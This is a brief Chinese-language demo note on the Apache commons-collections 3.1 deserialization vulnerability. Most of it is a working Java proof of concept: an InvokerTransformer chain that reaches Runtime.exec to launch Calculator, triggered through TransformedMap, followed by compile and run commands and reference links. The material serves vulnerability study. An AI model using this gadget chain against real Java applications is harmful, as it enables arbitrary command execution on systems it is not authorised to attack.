参考:
https://xz.aliyun.com/t/4711
commons-collections-3.1反序列化漏洞Demo
依赖commons-collections-3.1
下载地址:
https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar
代码ApacheSerialize.java
:
import java.util.Map;
import java.util.Map.Entry;
import java.util.HashMap;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.map.TransformedMap;
public class ApacheSerialize {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"/System/Applications/Calculator.app/Contents/MacOS/Calculator"})
};
//将transformers数组存入ChaniedTransformer这个继承类
Transformer transformerChain = new ChainedTransformer(transformers);
//创建Map并绑定transformerChina
Map innerMap = new HashMap();
innerMap.put("value", "value");
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
//触发漏洞
Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();
onlyElement.setValue("foobar");
}
}
编译时带上commons-collections-3.1.jar的classpath:
javac -cp /Users/caiqiqi/Downloads/commons-collections-3.1.jar ApacheSerialize.java
执行时带上commons-collections-3.1.jar的classpath:
java -cp .:/Users/caiqiqi/Downloads/commons-collections-3.1.jar ApacheSerialize
讲jdk8u这个gadget的:
https://codewhitesec.blogspot.com/2018/01/handcrafted-gadgets.html